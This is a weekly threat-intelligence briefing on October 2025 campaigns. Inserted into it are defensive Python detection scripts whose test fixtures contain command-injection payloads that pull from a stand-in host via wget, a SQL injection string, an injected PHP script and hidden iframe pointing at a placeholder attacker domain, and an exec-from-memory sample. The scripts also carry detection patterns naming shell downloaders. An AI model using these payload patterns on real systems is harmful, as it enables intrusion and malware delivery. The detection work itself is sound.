Weekly Threat Briefing
Diamond Trail

Cyware Weekly Threat Intelligence, October 06–10, 2025


Security teams are racing against RondoDox, a botnet that's blasting through 56 vulnerabilities across 30+ vendors to hijack routers, DVRs, NVRs, and web servers. Chinese hackers, likely state-linked, are hijacking the Nezha monitoring tool to deploy Gh0st RAT, compromising over 100 servers. Storm-1175 is tearing through GoAnywhere MFT with a devastating flaw to deploy Medusa ransomware. Attackers exploit this CVSS 10.0 deserialization bug for unauthenticated code execution, using tools like SimpleHelp to lock down networks swiftly.

Russian Android users are in the crosshairs of ClayRat, a slick spyware masquerading as WhatsApp, TikTok, or YouTube apps spread via Telegram and phishing lures, with over 600 samples detected in just three months. A cunning Python-based RAT is outsmarting defenses by rewriting its code on every run. This malware encrypts and executes from memory, sidestepping file scans, while injecting junk code and shuffling functions to create unique signatures. BatShadow is casting a net over job seekers with fake offers laced with Vampire Bot malware. Vietnamese hackers deliver ZIPs disguised as corporate docs, tricking victims into Edge-specific downloads.

The Good

  • The FBI, in collaboration with French law enforcement, has seized the BreachForums hacking forum, operated by the ShinyHunters group, which was used for leaking corporate data and extorting companies. This action comes as the group threatened to release data from Salesforce breaches unless ransoms were paid. The seizure includes all database backups since 2023, confirming that the gang's operations have been compromised. Despite this, their dark web data leak site remains active, with plans to expose sensitive information from major companies like FedEx, Disney, and Google. ShinyHunters stated that they would not attempt to relaunch BreachForums, cautioning that such forums should now be viewed as traps for cybercriminals.

The Bad

  • The RondoDox botnet campaign has emerged as a significant threat, exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first identified in Pwn2Own contests. This campaign targets internet-facing devices such as routers, DVRs, NVRs, and web servers, posing risks of data exfiltration and operational disruptions. Active exploitation has been observed globally since mid-2025, with several vulnerabilities listed in CISA’s KEV catalog. RondoDox employs a "shotgun" approach, utilizing command-injection flaws to gain shell access and deploy multi-architecture payloads. The botnet has evolved through a "loader-as-a-service" model, co-packaging its exploits with other malware, thus increasing its effectiveness and urgency in the cybersecurity landscape.
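The two observable traits above, command injection through request parameters and a "shotgun" spray across many different endpoints from one source, can both be picked out of ordinary web-server access logs. The script below is an added example written for this briefing, not code from the report or from any vendor; the log lines, IPs and hostnames are constructed placeholders, and the command keyword list and the three-endpoint threshold are assumptions you would tune for your own estate.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed Apache/nginx combined-format access log lines (not from the report).
# 203.0.113.0/24 and the .invalid TLD are reserved for documentation; paths are placeholders.
SAMPLE_LOG = """\
203.0.113.10 - - [07/Oct/2025:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [07/Oct/2025:10:01:05 +0000] "GET /cgi-bin/ping.cgi?host=127.0.0.1%3Bcd+%2Ftmp%3Bwget+http%3A%2F%2Fc2.invalid%2Fa HTTP/1.1" 200 0 "-" "-"
203.0.113.11 - - [07/Oct/2025:10:01:06 +0000] "GET /apply.cgi?cmd=%60id%60 HTTP/1.1" 404 0 "-" "-"
203.0.113.11 - - [07/Oct/2025:10:01:07 +0000] "GET /setup.cgi?next=$(wget+http://c2.invalid/b) HTTP/1.1" 404 0 "-" "-"
203.0.113.12 - - [07/Oct/2025:10:01:09 +0000] "GET /search?q=cats%7Cdogs HTTP/1.1" 200 100 "-" "Mozilla/5.0"
203.0.113.13 - - [07/Oct/2025:10:01:12 +0000] "GET /login?user=admin%27%20OR%201%3D1 HTTP/1.1" 200 80 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# A shell metacharacter followed by a typical downloader/interpreter name, or command
# substitution via $(...) or backticks. Keyword list is an assumption; extend per environment.
CMDI_RE = re.compile(
    r"(?:[;|&`]|\$\()\s*(?:cd|wget|curl|tftp|busybox|sh|bash|chmod|nc|cat|id|echo)\b"
    r"|\$\([^)]*\)"
    r"|`[^`]+`",
    re.IGNORECASE,
)


def parse_line(line):
    """Parse one combined-format log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["decoded"] = unquote_plus(rec["target"])  # payloads hide behind %XX and '+' encoding
    return rec


def is_command_injection(target):
    """True if the request target contains a shell command pattern after URL decoding."""
    return CMDI_RE.search(unquote_plus(target)) is not None


def analyse(log_text, shotgun_threshold=3):
    """Return injection hits plus sources that sprayed injections at >= threshold distinct endpoints."""
    hits = []
    paths_by_ip = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_command_injection(rec["target"]):
            continue
        path = rec["decoded"].split("?", 1)[0]
        hits.append((rec["ip"], rec["decoded"]))
        paths_by_ip[rec["ip"]].add(path)
    shotgun = {ip: sorted(p) for ip, p in paths_by_ip.items() if len(p) >= shotgun_threshold}
    return {"injections": hits, "shotgun_sources": shotgun}


if __name__ == "__main__":
    result = analyse(SAMPLE_LOG)
    for ip, req in result["injections"]:
        print(f"command injection from {ip}: {req}")
    for ip, paths in result["shotgun_sources"].items():
        print(f"shotgun source {ip} hit {len(paths)} distinct endpoints: {paths}")
```

The decoding step matters: the same `;cd /tmp;wget` payload arrives as `%3Bcd+%2Ftmp%3Bwget`, so matching on the raw target would miss it. The per-source endpoint count is what separates a single opportunistic probe from a loader that tries dozens of vendor-specific paths in sequence.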

  • Hackers are now leveraging the Velociraptor DFIR tool in ransomware attacks, particularly with LockBit and Babuk variants. This activity is linked to a China-based group known as Storm-2603, which is associated with nation-state actors. The attackers exploit an outdated version of Velociraptor, vulnerable to a privilege escalation issue (CVE-2025-6264), allowing them to create local admin accounts and gain persistent access to compromised systems. Once inside, they utilize Velociraptor to maintain control and execute commands remotely. Additionally, they deploy PowerShell scripts for file exfiltration and encryption, employing techniques to evade detection.

  • Volexity has identified UTA0388, a China-aligned threat actor conducting sophisticated spear phishing campaigns since April, targeting organizations globally with a focus on Asian geopolitical issues, particularly Taiwan. Utilizing OpenAI's ChatGPT, UTA0388 crafts convincing phishing emails and develops a custom malware family known as GOVERSHELL, which has five distinct variants, each with evolving capabilities and communication methods. The phishing emails often exhibit incoherence, featuring fabricated personas and nonsensical details, indicative of LLM usage. The GOVERSHELL malware employs techniques like search order hijacking and scheduled tasks for persistence, while its infrastructure has shifted from direct-to-IP connections to more complex DNS-based domains.

  • Chinese hackers with suspected ties to the state have begun exploiting the open-source Nezha monitoring tool to deliver the Gh0st RAT. This campaign, identified by Huntress, utilizes log poisoning techniques to implant web shells on vulnerable servers, primarily targeting systems with exposed phpMyAdmin panels. The attackers have compromised over 100 machines globally, with significant infections reported in Taiwan, Japan, South Korea, and Hong Kong. By leveraging Nezha, the hackers execute commands and bypass antivirus protections, showcasing a concerning trend of using legitimate tools for malicious activities. The operation is characterized by its technical sophistication, as the threat actors manipulate SQL commands to drop PHP web shells, enabling further exploitation of the affected systems.

  • A critical vulnerability, CVE-2025-10035, in GoAnywhere MFT has been exploited by the Storm-1175 threat group, known for deploying Medusa ransomware. This deserialization flaw, with a CVSS score of 10.0, allows attackers to bypass signature verification and execute remote code on unpatched systems without requiring authentication. Storm-1175 employs a multi-stage attack that begins with exploiting the vulnerability, followed by establishing persistence using remote monitoring and management tools like SimpleHelp and MeshAgent. The group then conducts network discovery and lateral movement within compromised environments, ultimately leading to the deployment of Medusa ransomware. 

  • Mustang Panda, a sophisticated China-linked threat actor, has refined its cyber espionage tactics by employing an advanced DLL side-loading technique aimed at the Tibetan community. This politically motivated campaign begins with a deceptive .ZIP file disguised as an executable related to the Dalai Lama, concealing a malicious DLL that remains hidden from standard file exploration. The malware, known as Claimloader, establishes persistence through both Windows registry modifications and scheduled tasks, complicating detection and removal efforts. Once activated, it deploys a secondary payload called Publoader, which utilizes advanced obfuscation methods to exfiltrate data while communicating with C2 servers.

  • A recent malvertising campaign targeted WordPress websites by injecting malicious JavaScript into the theme’s functions.php file. This code fetched external scripts from attacker-controlled domains, resulting in forced redirects and pop-ups for unsuspecting visitors. The investigation revealed that the compromised function, ti_custom_javascript(), established a connection to a Command and Control server, allowing the attackers to deliver harmful payloads. The malicious script included techniques such as hidden iframes and mimicked legitimate Cloudflare actions to evade detection. 
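A compromised theme file of this kind is easy to audit for mechanically: look for output hooks (`wp_head`, `wp_footer`) whose functions emit script tags pointing at hosts the site does not normally load from, and for iframes styled to be invisible. The scanner below is an added example written for this briefing, not code from the report or from WordPress; the `functions.php` excerpt is constructed (only the `ti_custom_javascript()` name comes from the report, and the domain is a placeholder), and the host allowlist is an assumption you would populate from the site's legitimate CDNs.

```python
import re
from urllib.parse import urlparse

# Constructed functions.php excerpt modelled on the injection the report describes.
# ti_custom_javascript() is the function name from the report; the domain is a placeholder.
SAMPLE_FUNCTIONS_PHP = r'''<?php
function theme_enqueue_assets() {
    wp_enqueue_style('theme-style', get_stylesheet_uri());
    wp_enqueue_script('jquery-cdn', 'https://code.jquery.com/jquery-3.7.1.min.js');
}
add_action('wp_enqueue_scripts', 'theme_enqueue_assets');

function ti_custom_javascript() { ?>
<script src="https://attacker-placeholder.invalid/load.js"></script>
<iframe src="https://attacker-placeholder.invalid/frame" style="display:none;width:0;height:0"></iframe>
<?php }
add_action('wp_head', 'ti_custom_javascript');
'''

# Assumed per-site allowlist: hosts the theme legitimately loads scripts from.
ALLOWED_HOSTS = {"code.jquery.com", "cdnjs.cloudflare.com"}

SCRIPT_SRC_RE = re.compile(r'<script[^>]*\ssrc\s*=\s*["\']([^"\']+)["\']', re.I)
ENQUEUE_RE = re.compile(r'wp_enqueue_script\s*\(\s*["\'][^"\']*["\']\s*,\s*["\']([^"\']+)["\']', re.I)
IFRAME_RE = re.compile(r'<iframe[^>]*>', re.I)
HIDDEN_RE = re.compile(r'display\s*:\s*none|visibility\s*:\s*hidden|\bwidth\s*[:=]\s*["\']?0\b', re.I)
HOOK_RE = re.compile(r'add_action\s*\(\s*["\'](wp_head|wp_footer)["\']\s*,\s*["\'](\w+)["\']')
FUNC_DEF_RE = re.compile(r'function\s+(\w+)\s*\(')


def enclosing_function(src, pos):
    """Name of the last PHP function defined before offset pos (None at file scope)."""
    name = None
    for m in FUNC_DEF_RE.finditer(src, 0, pos):
        name = m.group(1)
    return name


def scan_functions_php(src, allowed_hosts=ALLOWED_HOSTS):
    """Flag external script loads from non-allowlisted hosts and hidden iframes, reporting the
    PHP function that emits them and the WordPress output hook that function is attached to."""
    hooked = {fn: hook for hook, fn in HOOK_RE.findall(src)}
    findings = []

    def record(kind, match, **extra):
        fn = enclosing_function(src, match.start())
        findings.append({"type": kind, "function": fn, "hook": hooked.get(fn), **extra})

    # Both raw <script src> tags in PHP output blocks and wp_enqueue_script() URLs count.
    for m in list(SCRIPT_SRC_RE.finditer(src)) + list(ENQUEUE_RE.finditer(src)):
        host = urlparse(m.group(1)).hostname
        if host and host not in allowed_hosts:
            record("external_script", m, host=host)
    for m in IFRAME_RE.finditer(src):
        if HIDDEN_RE.search(m.group(0)):
            record("hidden_iframe", m, tag=m.group(0))
    return findings


if __name__ == "__main__":
    for finding in scan_functions_php(SAMPLE_FUNCTIONS_PHP):
        print(finding)
```

Run it against every theme's `functions.php` (and any `wp_head`-hooked file) on a schedule, and diff the findings against the last clean run; the hook attribution tells you immediately which function to excise.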

New Threats

  • ClayRat is Android spyware targeting Russian users, spreading through Telegram and phishing sites while impersonating popular apps. The spyware collects sensitive data, takes photos, sends messages, and places calls from infected devices. ClayRat aggressively propagates by sending malicious links to all contacts in the victim's phone book. It uses advanced obfuscation techniques and session-based installation to bypass Android security measures. Abuse of the default SMS handler role allows ClayRat to access and manipulate SMS data without user consent.

  • A new Python-based RAT employs advanced polymorphic and self-modifying techniques, altering its code signature with each execution to evade detection. The RAT uses functions like self_modifying_wrapper(), decrypt_and_execute(), and polymorph_code() for on-the-fly mutation, leveraging Python’s introspection and serialization capabilities. The malware wraps critical code in a self-modifying layer, encrypts and decrypts code using XOR encryption, and executes it from memory, bypassing traditional file-based scanning. The polymorph_code() function introduces random junk code, renames variables, shuffles functions, and injects no-op routines to create unique file signatures for every execution. The RAT includes offensive features like network scanning, payload delivery, data theft, self-propagation, and bot command interaction via platforms like Discord and Slack.
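Because the file signature changes on every run, hash-based matching is of little use against this RAT; what stays constant is the combination of building blocks the item lists (XOR decryption, execution of non-literal code from memory, introspection of its own source, high-entropy blobs). The script below is an added example written for this briefing, not the malware's code or any vendor's detector. It parses Python source with the standard `ast` module and counts those indicators; both sample scripts are constructed (the "suspect" one reuses the function names from the report around a random, non-functional byte blob), and the weighting rule is an assumption.

```python
import ast
import math
from collections import Counter

# Constructed samples (not the malware's code). SAMPLE_SUSPECT mirrors the building blocks
# the report names (XOR decrypt, exec from memory, inspect-based rewriting); its byte blob is
# random filler, so it does nothing useful if run. SAMPLE_BENIGN is ordinary utility code.
SAMPLE_SUSPECT = r'''
import marshal, inspect, random
KEY = 0x5a
BLOB = b"\x9f\x12\xc3\x7b\x01\xee\x48\xa0\x33\x5d\x8e\x17\xf4\x6a\xb9\x02\xd1\x7e\x25\xcc\x93\x40\x0b\xe7\x58\xa6\x1c\xf0\x69\xb3\x2d\xd8"

def decrypt_and_execute(blob, key):
    code = bytes(b ^ key for b in blob)
    exec(marshal.loads(code))

def polymorph_code(fn):
    src = inspect.getsource(fn)
    return src.replace("pass", "pass  # " + str(random.random()))
'''

SAMPLE_BENIGN = '''
import json

def load_config(path):
    with open(path) as fh:
        return json.load(fh)

def checksum(data):
    total = 0
    for b in data:
        total ^= b
    return total
'''

EXEC_SINKS = {"exec", "eval", "compile"}
OTHER_CALLS = {"marshal.loads", "pickle.loads", "inspect.getsource", "types.FunctionType"}


def call_name(node):
    """'exec' for exec(...), 'marshal.loads' for marshal.loads(...), else None."""
    f = node.func
    if isinstance(f, ast.Name):
        return f.id
    if isinstance(f, ast.Attribute) and isinstance(f.value, ast.Name):
        return f"{f.value.id}.{f.attr}"
    return None


def shannon_entropy(data):
    """Bits per byte: random or encrypted data sits near 8, natural text near 4 to 5."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def indicator_counts(src):
    """Count self-modification indicators in Python source via the AST, not string matching."""
    hits = Counter()
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Call):
            name = call_name(node)
            if name in EXEC_SINKS:
                # exec/eval of a literal string is static; only a non-literal argument can be
                # code that was assembled or decrypted at run time.
                if node.args and not isinstance(node.args[0], ast.Constant):
                    hits[name] += 1
            elif name in OTHER_CALLS:
                hits[name] += 1
        elif isinstance(node, (ast.BinOp, ast.AugAssign)) and isinstance(node.op, ast.BitXor):
            hits["xor"] += 1
        elif isinstance(node, ast.Constant) and isinstance(node.value, (bytes, str)):
            raw = node.value if isinstance(node.value, bytes) else node.value.encode()
            if len(raw) >= 32 and shannon_entropy(raw) > 4.5:  # thresholds are assumptions
                hits["high_entropy_literal"] += 1
    return hits


def assess(src):
    """Suspect when an execution sink takes non-literal input and at least two other indicators co-occur."""
    hits = indicator_counts(src)
    has_sink = any(k in EXEC_SINKS for k in hits)
    others = {k for k in hits if k not in EXEC_SINKS}
    return {"indicators": dict(hits), "self_modifying_suspect": has_sink and len(others) >= 2}


if __name__ == "__main__":
    for label, sample in (("suspect", SAMPLE_SUSPECT), ("benign", SAMPLE_BENIGN)):
        print(label, assess(sample))
```

A single XOR or a single `exec` is common in legitimate code, which is why the verdict requires the sink to co-occur with two further indicators; the benign sample's checksum loop uses XOR and is left alone. Running the same assessment over every file the loader writes or every payload recovered from memory gives a stable signal even though each on-disk copy hashes differently.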

  • The Vietnamese threat actor group BatShadow is conducting a new campaign targeting job seekers and digital marketing professionals using social engineering tactics to distribute a Go-based malware named "Vampire Bot." Malicious files disguised as job descriptions and corporate documents are delivered via ZIP archives containing decoy PDFs and harmful LNK or executable files. Victims are tricked into opening these files, triggering an infection chain involving PowerShell scripts to download additional payloads, including remote desktop software for persistent access. The attackers exploit browser-specific behaviors, instructing victims to use Microsoft Edge to bypass security restrictions and download malicious files.

  • Google has released Chrome version 141.0.7390.65/.66 to address three critical security vulnerabilities that could allow attackers to execute arbitrary code. These flaws include CVE-2025-11458, a high-severity heap buffer overflow in Chrome Sync and CVE-2025-11460, another high-severity issue involving a use-after-free error in the Storage component. Additionally, CVE-2025-11211 is a medium-severity out-of-bounds read in WebCodecs, reported by Jakob Košir. All three vulnerabilities require user interaction with specially crafted web content to be exploited, making them particularly dangerous. 

  • A new Android RAT, dubbed the "Most Powerful (FUD Android RAT) 2025," has emerged on GitHub, designed to evade antivirus detection and operate entirely through a web interface. This RAT allows attackers to manage compromised devices in real-time without needing a PC, utilizing advanced encryption methods to maintain secure communication. It features a wide array of malicious capabilities, including call recording, SMS interception, credential theft from banking apps, and live GPS tracking. Additionally, it can bypass restrictions on Chinese ROMs and remains persistent by consuming minimal resources.

  • New variants of the XWorm malware, specifically versions 6.0, 6.4, and 6.5, have re-emerged in phishing campaigns, featuring over 35 plugins that enhance its malicious capabilities, including ransomware functionalities. Initially observed in 2022, XWorm is a modular remote access trojan known for its ability to steal sensitive data, track keystrokes, and launch DDoS attacks. Following the abandonment of the project by its original developer, XCoder, various cybercriminals have begun distributing cracked versions. Its ransomware module encrypts files, appending a .ENC extension, while providing victims with ransom instructions, demonstrating a notable overlap with the NoCry ransomware’s encryption techniques.
